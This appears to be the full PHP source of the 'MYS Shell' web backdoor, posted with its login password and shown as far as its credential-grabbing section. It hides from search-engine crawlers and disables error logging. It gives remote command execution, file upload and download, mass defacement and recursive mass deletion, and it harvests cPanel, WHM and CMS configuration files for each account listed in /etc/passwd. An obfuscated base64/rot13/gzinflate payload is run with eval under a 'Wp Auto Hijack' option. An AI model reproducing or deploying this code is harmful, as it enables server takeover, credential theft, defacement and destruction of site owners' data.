shell M.Y.S Pass:MHM

1. <?php
2. $auth_pass = "67d4aef06984f2bf6ef5c20d4dff4e18";
3. session_start();
4. error_reporting(0);
5. set_time_limit(0);
6. @set_magic_quotes_runtime(0);
7. @clearstatcache();
8. @ini_set('error_log',NULL);
9. @ini_set('log_errors',0);
10. @ini_set('max_execution_time',0);
11. @ini_set('output_buffering',0);
12. @ini_set('display_errors', 0);
13.  
14.  
15. $color = "#00FF00";
16. $default_action = 'FilesMan';
17. $default_use_ajax = true;
18. $default_charset = 'UTF-8';
19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
20.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
21.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
22.         header('HTTP/1.0 404 Not Found');
23.         exit;
24.     }
25. }
26.  
27. function login_shell() {
28. ?>
29. <html>
30. <body><body> <script>    alert('^_^ MYS Shell By Ameer Awwad & MHM ^_^ ')   </script></body>
31. <script type="text/javascript">
32.     var message = new Array()
33.         message[0] = " MYS SHELL";
34.         message[1] = " MYS SHELL";
35.         message[2] = " M_";
36.         message[3] = " MY_";
37.         message[4] = " MYS_";
38.         message[5] = " MYS _";
39.         message[6] = " MYS S_ ";
40.         message[7] = " MYS SH_";
41.         message[7] = " MYS SHE_";
42.         message[8] = " MYS SHEL_";
43.         message[10] = " MYS SHELL_";
44.     var reps = 2
45.     var speed =20
46.     var p=message.length;
47.     var T="";
48.     var C=0;
49.     var mC=0;
50.     var s=0;
51.     var sT=null;
52.     if(reps<1)reps=1;
53.     function doTheThing(){
54.     T=message[mC];
55.     A();}
56.     function A(){
57.     s++
58.     if(s>9){s=1}
59.     if(s==1){document.title=' '+T+' '}
60.     if(C<(8*reps)){
61.     sT=setTimeout("A()",speed);
62.     C++
63.     }else{
64.     C=0;
65.     s=0;
66.     mC++
67.     if(mC>p-1)mC=0;
68.     sT=null;
69.     doTheThing();}}
70.     doTheThing();
71. </script>
72. <head>
73. <title>MYS TEAM</title>
74. <link href='https://thecryptoshow.com/wp-content/uploads/2017/11/fatcom-1.ico' rel='icon' type='image/x-icon'/>
75. <style type="text/css">
76. body {
77.       background-color: #000000;
78.     background-image: url(https://image.ibb.co/nir4Gp/41659939_2148223895394113_8730856789718859776_n.jpg);
79.     <!--https://image.ibb.co/nir4Gp/41659939_2148223895394113_8730856789718859776_n.jpg-->
80.     margin-left: 0px;
81.     margin-top: 0px;
82.     margin-right: 0px;
83.     margin-bottom: 0px;
84.     background-position:center;
85.     background-repeat:no-repeat;
86.     background-size:50%
87. }
88. html {
89.      background:#387c6c;
90.   -webkit-background-size: cover;
91.   -moz-background-size: cover;
92.   -o-background-size: cover;
93.   background-size: cover;
94. }
95. html,body{margin:0;padding:0;height:100%;font:10px Arial;}
96. #wrapper{min-height:100%;position:relative;}
97. #header{background:#ff0000;padding:5px;height:50px;color:#3000ff;}
98. #body{padding-bottom:40px;padding-left:10px;}
99. #footer{background:#ff0000;position:absolute;bottom:0;width:100%;
100.    text-align:center;color:#408080;}
101. header {
102.     color: ;
103.     margin: 10px auto;
104. }
105.  
106. </style>
107. </head>
108.  
109. <center>
110. <font face="monospace" size='3' color='cyan'><br>
111.  
112.  
113. <header>
114. <pre>
115.     </pre>
116. </header>
117. <br><br><br><br><br><br><br><br>
118. <fieldset>
119.             <label for="login">Username</label>
120.         <form method="post">
121. <input type="text" name="id" value="MHM">
122. </form>
123. Password
124. <form method="post">
125. <input type="password" name="pass"> <br><br>
126. <input type="submit" value="Login">
127. </fieldset>
128. </form>
129. <style>
130. </style>
131. </head>
132. <body>
133.  
134. </font>
135. </body>
136. </head>
137. <table border="0" cellspacing="1" cellpadding="4" class="tborder"><tr><td class="thead"><strong></strong></td></tr><tr><td class="trow1"></a></td></tr></table><br />
138. <table border="0" cellspacing="1" cellpadding="4" class="tborder">
139. <tbody><tr>
140. <?php
141. exit;
142. }
143. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
144.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
145.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
146.     else
147.         login_shell();
148. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
149.     @ob_clean();
150.     $file = $_GET['file'];
151.     header('Content-Description: File Transfer');
152.     header('Content-Type: application/octet-stream');
153.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
154.     header('Expires: 0');
155.     header('Cache-Control: must-revalidate');
156.     header('Pragma: public');
157.     header('Content-Length: ' . filesize($file));
158.     readfile($file);
159.     exit;
160. }
161. ?>
162. <html>
163. <head>
164. <title>MYS shell </title>
165. <meta name='author' content='Recode MYS Team'>
166. <meta charset="UTF-8">
167. <link href='https://thecryptoshow.com/wp-content/uploads/2017/11/fatcom-1.ico' rel='icon' type='image/x-icon'/>
168. <style type='text/css'>
169. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
170. html {
171.     background: #2d4746;
172.     color: #00ffe9;
173.     font-family: 'Share Tech Mono';
174.     font-size: 12px;
175.     width: 100%;
176. }
177. li {
178.     display: inline;
179.     margin: 1px;
180.     padding: 1px;
181. }
182.  
183.  #menu{
184.     background:#2D4746;
185.     margin:9px 3px 4px 2px;
186. }
187. #menu a{
188.     padding:4px 19px;
189.     margin:0;
190.     background:#3b5653;
191.     text-decoration:none;
192.     letter-spacing:2px;
193.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
194.  
195. }
196. #menu a:hover{
197.     background:#3b5653;
198.     border-bottom:1px solid #4a7a75;
199.     border-top:1px solid #4a7a75;
200. }
201. .explore tr:hover{background:#3b5653}
202. table tr:first-child{  
203.     background: #619996;
204.     text-align: center;
205.     color: white;
206. }
207. table, th, td {
208.     border-collapse:collapse;
209.     font-family: Tahoma, Geneva, sans-serif;
210.     background: transparent;
211.     font-family: 'Share Tech Mono';
212.     font-size: 13px;
213. }
214. .table_home, .th_home, .td_home {
215.     border: 1px solid #619996;
216. }
217. th {
218.     padding: 10px;
219. }
220. a {
221.     color: #00ffe9;
222.     text-decoration: none;
223. }
224. a:hover {
225.     color: red;
226.     text-decoration: underline;
227. }
228. b {
229.     color: white;
230. }
231. input[type=text], input[type=password],input[type=submit] {
232.     background: transparent;
233.     color: #00ffe9;
234.     border: 1px solid #00ffe9;
235.     margin: 5px auto;
236.     padding-left: 5px;
237.     font-family: 'Share Tech Mono';
238.     font-size: 13px;
239. }
240. input[type=submit] {
241.     background: #619996;
242.     color: #00ffe9;
243.     border: 1px solid #00ffe9;
244.     margin: 5px auto;
245.     padding-left: 5px;
246.     font-family: 'Share Tech Mono';
247.     font-size: 13px;
248.     cursor:pointer;
249. }
250. textarea {
251.     border: 1px solid #00ffe9;
252.     width: 100%;
253.     height: 400px;
254.     padding-left: 5px;
255.     margin: 10px auto;
256.     resize: none;
257.     background: transparent;
258.     color: #ffffff;
259.     font-family: 'Share Tech Mono';
260.     font-size: 13px;
261. }
262. select {
263.     width: 152px;
264.     background: #435651;
265.     color: white;
266.     border: 1px solid #00ffe9;
267.     margin: 5px auto;
268.     padding-left: 5px;
269.     font-family: 'Share Tech Mono';
270.     font-size: 13px;
271. }
272. option:hover {
273.     background: white;
274.     color: #435651;
275. }
276. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
277. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
278. .infoweb {
279.     border-right: 1px solid #00FFFF;
280. }
281. </style>
282. </head>
283. <?php
284. ###############################################################################
285. //     Mngganti Copyright tidak akan menjadikan anda sebagai programer
286. ###############################################################################
287. function w($dir,$perm) {
288.     if(!is_writable($dir)) {
289.         return "<font color=red>".$perm."</font>";
290.     } else {
291.         return "<font color=green>".$perm."</font>";
292.     }
293. }
294. function r($dir,$perm) {
295.     if(!is_readable($dir)) {
296.         return "<font color=red>".$perm."</font>";
297.     } else {
298.         return "<font color=green>".$perm."</font>";
299.     }
300. }
301. function exe($cmd) {
302.     if(function_exists('system')) {        
303.         @ob_start();       
304.         @system($cmd);     
305.         $buff = @ob_get_contents();        
306.         @ob_end_clean();       
307.         return $buff;  
308.     } elseif(function_exists('exec')) {        
309.         @exec($cmd,$results);      
310.         $buff = "";        
311.         foreach($results as $result) {         
312.             $buff .= $result;      
313.         } return $buff;    
314.     } elseif(function_exists('passthru')) {        
315.         @ob_start();       
316.         @passthru($cmd);       
317.         $buff = @ob_get_contents();        
318.         @ob_end_clean();       
319.         return $buff;  
320.     } elseif(function_exists('shell_exec')) {      
321.         $buff = @shell_exec($cmd);     
322.         return $buff;  
323.     }
324. }
325. function perms($file){
326.     $perms = fileperms($file);
327.     if (($perms & 0xC000) == 0xC000) {
328.     // Socket
329.     $info = 's';
330.     } elseif (($perms & 0xA000) == 0xA000) {
331.     // Symbolic Link
332.     $info = 'l';
333.     } elseif (($perms & 0x8000) == 0x8000) {
334.     // Regular
335.     $info = '-';
336.     } elseif (($perms & 0x6000) == 0x6000) {
337.     // Block special
338.     $info = 'b';
339.     } elseif (($perms & 0x4000) == 0x4000) {
340.     // Directory
341.     $info = 'd';
342.     } elseif (($perms & 0x2000) == 0x2000) {
343.     // Character special
344.     $info = 'c';
345.     } elseif (($perms & 0x1000) == 0x1000) {
346.     // FIFO pipe
347.     $info = 'p';
348.     } else {
349.     // Unknown
350.     $info = 'u';
351.     }
352.         // Owner
353.     $info .= (($perms & 0x0100) ? 'r' : '-');
354.     $info .= (($perms & 0x0080) ? 'w' : '-');
355.     $info .= (($perms & 0x0040) ?
356.     (($perms & 0x0800) ? 's' : 'x' ) :
357.     (($perms & 0x0800) ? 'S' : '-'));
358.     // Group
359.     $info .= (($perms & 0x0020) ? 'r' : '-');
360.     $info .= (($perms & 0x0010) ? 'w' : '-');
361.     $info .= (($perms & 0x0008) ?
362.     (($perms & 0x0400) ? 's' : 'x' ) :
363.     (($perms & 0x0400) ? 'S' : '-'));
364.     // World
365.     $info .= (($perms & 0x0004) ? 'r' : '-');
366.     $info .= (($perms & 0x0002) ? 'w' : '-');
367.     $info .= (($perms & 0x0001) ?
368.     (($perms & 0x0200) ? 't' : 'x' ) :
369.     (($perms & 0x0200) ? 'T' : '-'));
370.     return $info;
371. }
372. function hdd($s) {
373.     if($s >= 1073741824)
374.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
375.     elseif($s >= 1048576)
376.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
377.     elseif($s >= 1024)
378.     return sprintf('%1.2f',$s / 1024 ) .' KB';
379.     else
380.     return $s .' B';
381. }
382. function ambilKata($param, $kata1, $kata2){
383.     if(strpos($param, $kata1) === FALSE) return FALSE;
384.     if(strpos($param, $kata2) === FALSE) return FALSE;
385.     $start = strpos($param, $kata1) + strlen($kata1);
386.     $end = strpos($param, $kata2, $start);
387.     $return = substr($param, $start, $end - $start);
388.     return $return;
389. }
390. function getsource($url) {
391.     $curl = curl_init($url);
392.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
393.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
394.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
395.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
396.     $content = curl_exec($curl);
397.             curl_close($curl);
398.     return $content;
399. }
400. function bing($dork) {
401.     $npage = 1;
402.     $npages = 30000;
403.     $allLinks = array();
404.     $lll = array();
405.     while($npage <= $npages) {
406.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
407.         if($x) {
408.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
409.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
410.             $npage = $npage + 10;
411.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
412.         } else break;
413.     }
414.     $URLs = array();
415.     foreach($allLinks as $url){
416.         $exp = explode("/", $url);
417.         $URLs[] = $exp[2];
418.     }
419.     $array = array_filter($URLs);
420.     $array = array_unique($array);
421.     $sss = count(array_unique($array));
422.     foreach($array as $domain) {
423.         echo $domain."\n";
424.     }
425. }
426. function reverse($url) {
427.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
428.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
429.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
430.           curl_setopt($ch, CURLOPT_HEADER, 0);
431.           curl_setopt($ch, CURLOPT_POST, 1);
432.     $resp = curl_exec($ch);
433.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
434.     $array = explode(",,", $resp);
435.     unset($array[0]);
436.     foreach($array as $lnk) {
437.         $lnk = "http://$lnk";
438.         $lnk = str_replace(",", "", $lnk);
439.         echo $lnk."\n";
440.         ob_flush();
441.         flush();
442.     }
443.         curl_close($ch);
444. }
445. if(get_magic_quotes_gpc()) {
446.     function idx_ss($array) {
447.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
448.     }
449.     $_POST = idx_ss($_POST);
450.     $_COOKIE = idx_ss($_COOKIE);
451. }
452.  
453. if(isset($_GET['dir'])) {
454.     $dir = $_GET['dir'];
455.     chdir($dir);
456. } else {
457.     $dir = getcwd();
458. }
459. $kernel = php_uname();
460. $ip = gethostbyname($_SERVER['HTTP_HOST']);
461. $dir = str_replace("\\","/",$dir);
462. $scdir = explode("/", $dir);
463. $freespace = hdd(disk_free_space("/"));
464. $total = hdd(disk_total_space("/"));
465. $used = $total - $freespace;
466. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
467. $ds = @ini_get("disable_functions");
468. $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
469. $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
470. $wget = (exe('wget --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
471. $perl = (exe('perl --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
472. $python = (exe('python --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
473. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=green>NONE</font>";
474. if(!function_exists('posix_getegid')) {
475.     $user = @get_current_user();
476.     $uid = @getmyuid();
477.     $gid = @getmygid();
478.     $group = "?";
479. } else {
480.     $uid = @posix_getpwuid(posix_geteuid());
481.     $gid = @posix_getgrgid(posix_getegid());
482.     $user = $uid['name'];
483.     $uid = $uid['uid'];
484.     $group = $gid['name'];
485.     $gid = $gid['gid'];
486. }
487. echo "System: <font color=green>".$kernel."</font><br>";
488. echo "User: <font color=green>".$user."</font> (".$uid.") Group: <font color=green>".$group."</font> (".$gid.")<br>";
489. echo "Server IP: <font color=green>".$ip."</font> | Your IP: <font color=green>".$_SERVER['REMOTE_ADDR']."</font><br>";
490. echo "HDD: <font color=green>$used</font> / <font color=green>$total</font> ( Free: <font color=green>$freespace</font> )<br>";
491. echo "Safe Mode: $sm<br>";
492. echo "Disable Functions: $show_ds<br>";
493. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
494. echo "Current DIR: ";
495. foreach($scdir as $c_dir => $cdir) {   
496.     echo "<a href='?dir=";
497.     for($i = 0; $i <= $c_dir; $i++) {
498.         echo $scdir[$i];
499.         if($i != $c_dir) {
500.         echo "/";
501.         }
502.     }
503.     echo "'>$cdir</a>/";
504. }
505.  
506. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
507. echo "<hr>";
508. echo "<center>";
509. echo "<ul>";
510. echo "<center><font size='10px' color='white'><bold>MYS shell</bold></font>";
511. echo "<center>Copyright &copy; ".date("Y")." - <a href='https://web.facebook.com/official.MYS.te/' target='_blank'><font color=red>MYS Team</font></a></center>";
512. echo "<br>";
513. echo '<center><div id="menu">';
514. echo "<li> <a href='?'>Home</a> </li>";
515. echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
516. echo "<li> <a href='?dir=$dir&do=cmd'>Command</a> </li>";
517. echo "<li> <a href='?dir=$dir&do=mass_deface'>mass_deface</a> </li>";
518. echo "<li> <a href='?dir=$dir&do=mass_delete'>mass_delete</a> </li>";
519. echo "<li> <a href='?dir=$dir&do=config'>config</a> </li>";
520. echo "<li> <a href='?dir=$dir&do=jumping'>jumping</a> </li>";
521. echo "<li> <a href='?dir=$dir&do=network'>Back Connect</a> </li>";
522. echo "<li> <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a></li><br><br>";
523. echo "<li> <a href='?dir=$dir&do=symlink'>Symlink</a> </li>";
524. echo "<li> <a href='?dir=$dir&do=cpanel'>Cpanel crack</a> </li>";
525. echo "<li> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li>";
526. echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
527. echo "<li> <a href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
528. echo "<li> <a href='?dir=$dir&do=network'>network</a> </li>";
529. echo "<li> <a href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
530. echo "<li> <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
531. echo "<li> <a href='?dir=$dir&do=adminer'>adminer</a> </li><br><br>";
532. echo "<li> <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> </li>";
533. echo "<li> <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> </li>";
534. echo "<li> <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface 2</a> </li>";
535. echo "<li> <a href='?dir=$dir&do=ports'>Port Scanner</a></li>";
536. echo "<li> <a href='?dir=$dir&do=hijack_wp'>Wp Auto Hijack</a> </li>";
537. echo "<li> <a href='?dir=$dir&do=reverse'>ReverseIP</a> </li><br><br>";
538. echo "<li> <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> </li>";
539. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF Online</a> </li>";
540. echo "<li> <a href='?do=bypass'>Disable Function</a> </li>";
541. echo "<li> <a href='?dir=$dir&do=endec'>Script Encode & Decode</a> </li>";
542. echo "<li> <a href='?dir=$dir&do=adfin'>Admin Finder</a> </li>";
543. echo "<li> <a href='?dir=$dir&do=ngindexx'>NginDexer</a> </li>";
544. echo "<li> <a href='?dir=$dir&do=whmcsdecod'>WHMCS Decoder</a> </li><br><br>";
545. echo "<li> <a href='?dir=$dir&do=contact'>Contact Me</a></li>";
546. echo "<li> <a href='?dir=$dir&do=about'>About Me</a></li>";
547. echo "<li> <a style='color: red;' href='?logout=true'>logout</a> </li>";
548. echo "</ul>";
549. echo "</center>";
550. echo "<hr>";
551. if($_GET['logout'] == true) {
552.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
553.     echo "<script>window.location='?';</script>";
554. } elseif($_GET['do'] == 'upload') {
555.     echo "<center>";
556.     if($_POST['upload']) {
557.         if($_POST['tipe_upload'] == 'biasa') {
558.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
559.                 $act = "<font color=green>Yes !! Succeed sir!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
560.             } else {
561.                 $act = "<font color=red>Failed !! Sorry Sir</font>";
562.             }
563.         } else {
564.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
565.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
566.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
567.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
568.                     $act = "<font color=green>Yes !! Succeed sir!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
569.                 } else {
570.                     $act = "<font color=red>Failed !! Sorry Sir</font>";
571.                 }
572.             } else {
573.                 $act = "<font color=red>Failed !! Sorry Sir</font>";
574.             }
575.         }
576.     }
577.     echo "Upload File:
578.     <form method='post' enctype='multipart/form-data'>
579.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
580.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
581.     <input type='file' name='ix_file'>
582.     <input type='submit' value='upload' name='upload'>
583.     </form>";
584.     echo $act;
585.     echo "</center>";
586. } elseif($_GET['do'] == 'hijack_wp')
587.     {
588. $gwtamvan="nUl6Yts2EP68APkPNy6AHDSO7DhOSsdFm+VyLbBoTl5DFFJgQxJ6ZJFRhqRve3j++46ULMvNki4TIIA63stmz92Rgmq84HDNWccTpZGlGVTlccIUL6beDvS2Dzc33oabG4DPdSJHDjQ2XBQBAQI5M6lVAiKFNgSVfhhSKmdizArD7DpRo8KA5n+xYD981e0GX+CTQ4lHWXj4QyR5Du/5nzS+hWbF73+Gm6DbfTXyrUg48tHeYnxIrw3zSaaywsTiRwDZ3BiljCa4N8prZAuKcoHHcERrYBaS4TqnRuajxINHsVbgpcbIoe9UrCgWsaK5NKLYjVLuz3EX7QzG9FiZCZp1f6/XH/i9fX+2xL0rkRzfU2aM1DRr539cXmxJd7jJS7hX86g0os5l5EqbqOUvIXizYxLD5oYqU+HvzQ20UMqGhSgYSSAWmUNQ+Kn/5vXB2RmgJE/nWQ37ZQ5NcTxsvNfN2MQMbv/fNB42N2uBtbaR1n2vu0GEMQwtB4PjcLf3YGRKa8luqwLeGhPEMm4bb60XtKQFONuA2PJpXYaDnpwfgvue0Jx0i+GZbxifx7cUWcrgSnHEHE8Fs1NWwudtCBFvqPXOTiwSdcan2LmVmISAT55CTqs4IGhQpM4PxlINJRTXc6pRKZ92jQO/96Y2G3jkmY33D23jwU7PaQkBH2TIYqljM+EyCsgypXdTyB6BCY1kgcFSTsILaSwSrMEvC/j986X1ZcFvJ4kWY5QzpuB1NqNWMzLrVi+/qmW7biC2zwjc06zEj1nENFjtAFBOZhTIdk2P89NTCTU0opqNrcnSMImKvGveDis24fMmRfX1rFKpmbLa4yRNxSm1wuc7oajWaWBbhmWWJESEEJ8iqRnAOFDrgNhocCxzBbE1UGy/1yOgxAyXr9EbaT0F2z9daUry+4BgXtiaqUhq7RKQ3uH1xWKB1dHYcYjNsIhKB46iM1/yZ77/+fqjhbYE0Trw1rLUcpTzpk2l3HhFrnTADQSpzP1Ix6k89OqR3ap3DAF5je2ofvEqgWqzR2O1ee277/ZpSII1jVe0RarpYVSpJCsV7nM3wEZOZKmR9JTpQaONjHs324071y16YkHQOPP9lQqZyfHyfOITdVwiW+jRnm1DP+/yhb7LxkuogsWmRjOzs1dkp1ZxG4SChLNBcuLOh872El/LmXMZ+sLG60c8ft9jC8cpcB+xoja/Oo1dYxerJnpSB6+PTZWvu5KpUodcn58cXZ223VyeXoG1HrvrBgKPoL+aYmfswaf3pxen8OEET+gBdoOxhP1LB03jdwVg7wUA6hlrEYQHYJlzLSB7QgAZvABV4eh9CYrVsu6SWXXW+Zarclq+fnrYdpaDVLirH5bmyJGrf6TqPvDw9vPCyzKONdPuAqzH+gR/BWBr0pzzZf33iDyi7/9SnkOe4eWyuwsw7PynYNXy4R8=";error_reporting(0);@set_time_limit(0);eval(gzinflate(str_rot13(base64_decode($gwtamvan))));
589.  
590. } elseif($_GET['do'] == 'cmd') {
591.     echo "<form method='post'>
592.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
593.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
594.     </form>";
595.     if($_POST['do_cmd']) {
596.         echo "<pre>".exe($_POST['cmd'])."</pre>";
597.     }
598. } elseif($_GET['do'] == 'mass_deface') {
599.     function sabun_massal($dir,$namafile,$isi_script) {
600.         if(is_writable($dir)) {
601.             $dira = scandir($dir);
602.             foreach($dira as $dirb) {
603.                 $dirc = "$dir/$dirb";
604.                 $lokasi = $dirc.'/'.$namafile;
605.                 if($dirb === '.') {
606.                     file_put_contents($lokasi, $isi_script);
607.                 } elseif($dirb === '..') {
608.                     file_put_contents($lokasi, $isi_script);
609.                 } else {
610.                     if(is_dir($dirc)) {
611.                         if(is_writable($dirc)) {
612.                             echo "[<font color=green>DONE</font>] $lokasi<br>";
613.                             file_put_contents($lokasi, $isi_script);
614.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
615.                         }
616.                     }
617.                 }
618.             }
619.         }
620.     }
621.     function sabun_biasa($dir,$namafile,$isi_script) {
622.         if(is_writable($dir)) {
623.             $dira = scandir($dir);
624.             foreach($dira as $dirb) {
625.                 $dirc = "$dir/$dirb";
626.                 $lokasi = $dirc.'/'.$namafile;
627.                 if($dirb === '.') {
628.                     file_put_contents($lokasi, $isi_script);
629.                 } elseif($dirb === '..') {
630.                     file_put_contents($lokasi, $isi_script);
631.                 } else {
632.                     if(is_dir($dirc)) {
633.                         if(is_writable($dirc)) {
634.                             echo "[<font color=green>DONE</font>] $dirb/$namafile<br>";
635.                             file_put_contents($lokasi, $isi_script);
636.                         }
637.                     }
638.                 }
639.             }
640.         }
641.     }
642.     if($_POST['start']) {
643.         if($_POST['tipe_sabun'] == 'mahal') {
644.             echo "<div style='margin: 5px auto; padding: 5px'>";
645.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
646.             echo "</div>";
647.         } elseif($_POST['tipe_sabun'] == 'murah') {
648.             echo "<div style='margin: 5px auto; padding: 5px'>";
649.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
650.             echo "</div>";
651.         }
652.     } else {
653.     echo "<center>";
654.     echo "<form method='post'>
655.     <font style='text-decoration: underline;'>Type :</font><br>
656.     <input type='radio' name='tipe_sabun' value='murah' checked>Normal<input type='radio' name='tipe_sabun' value='mahal'>Bulk<br>
657.     <font style='text-decoration: underline;'>Folder:</font><br>
658.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
659.     <font style='text-decoration: underline;'>Filename:</font><br>
660.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
661.     <font style='text-decoration: underline;'>Index File:</font><br>
662.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Ameer_Awwad & MHM</textarea><br>
663.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
664.     </form></center>";
665.     }
666. } elseif($_GET['do'] == 'mass_delete') {
667.     function hapus_massal($dir,$namafile) {
668.         if(is_writable($dir)) {
669.             $dira = scandir($dir);
670.             foreach($dira as $dirb) {
671.                 $dirc = "$dir/$dirb";
672.                 $lokasi = $dirc.'/'.$namafile;
673.                 if($dirb === '.') {
674.                     if(file_exists("$dir/$namafile")) {
675.                         unlink("$dir/$namafile");
676.                     }
677.                 } elseif($dirb === '..') {
678.                     if(file_exists("".dirname($dir)."/$namafile")) {
679.                         unlink("".dirname($dir)."/$namafile");
680.                     }
681.                 } else {
682.                     if(is_dir($dirc)) {
683.                         if(is_writable($dirc)) {
684.                             if(file_exists($lokasi)) {
685.                                 echo "[<font color=green>DELETED</font>] $lokasi<br>";
686.                                 unlink($lokasi);
687.                                 $idx = hapus_massal($dirc,$namafile);
688.                             }
689.                         }
690.                     }
691.                 }
692.             }
693.         }
694.     }
695.     if($_POST['start']) {
696.         echo "<div style='margin: 5px auto; padding: 5px'>";
697.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
698.         echo "</div>";
699.     } else {
700.     echo "<center>";
701.     echo "<form method='post'>
702.     <font style='text-decoration: underline;'>Folder:</font><br>
703.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
704.     <font style='text-decoration: underline;'>Filename:</font><br>
705.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
706.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
707.     </form></center>";
708.     }
709. } elseif($_GET['do'] == 'config') {
710.     if($_POST){
711.         $passwd = $_POST['passwd'];
712.         mkdir("noname_config", 0777);
713.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
714.         $htc = fopen("noname_config/.htaccess","w");
715.         fwrite($htc, $isi_htc);
716.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
717.         foreach($user_config[1] as $user_mys) {
718.             $user_config_dir = "/home/$user_mys/public_html/";
719.             if(is_readable($user_config_dir)) {
720.                 $grab_config = array(
721.                     "/home/$user_mys/.my.cnf" => "cpanel",
722.                     "/home/$user_mys/.accesshash" => "WHM-accesshash",
723.                     "/home/$user_mys/public_html/bw-configs/config.ini" => "BosWeb",
724.                     "/home/$user_mys/public_html/config/koneksi.php" => "Lokomedia",
725.                     "/home/$user_mys/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
726.                     "/home/$user_mys/public_html/clientarea/configuration.php" => "WHMCS",
727.                     "/home/$user_mys/public_html/whm/configuration.php" => "WHMCS",
728.                     "/home/$user_mys/public_html/whmcs/configuration.php" => "WHMCS",
729.                     "/home/$user_mys/public_html/forum/config.php" => "phpBB",
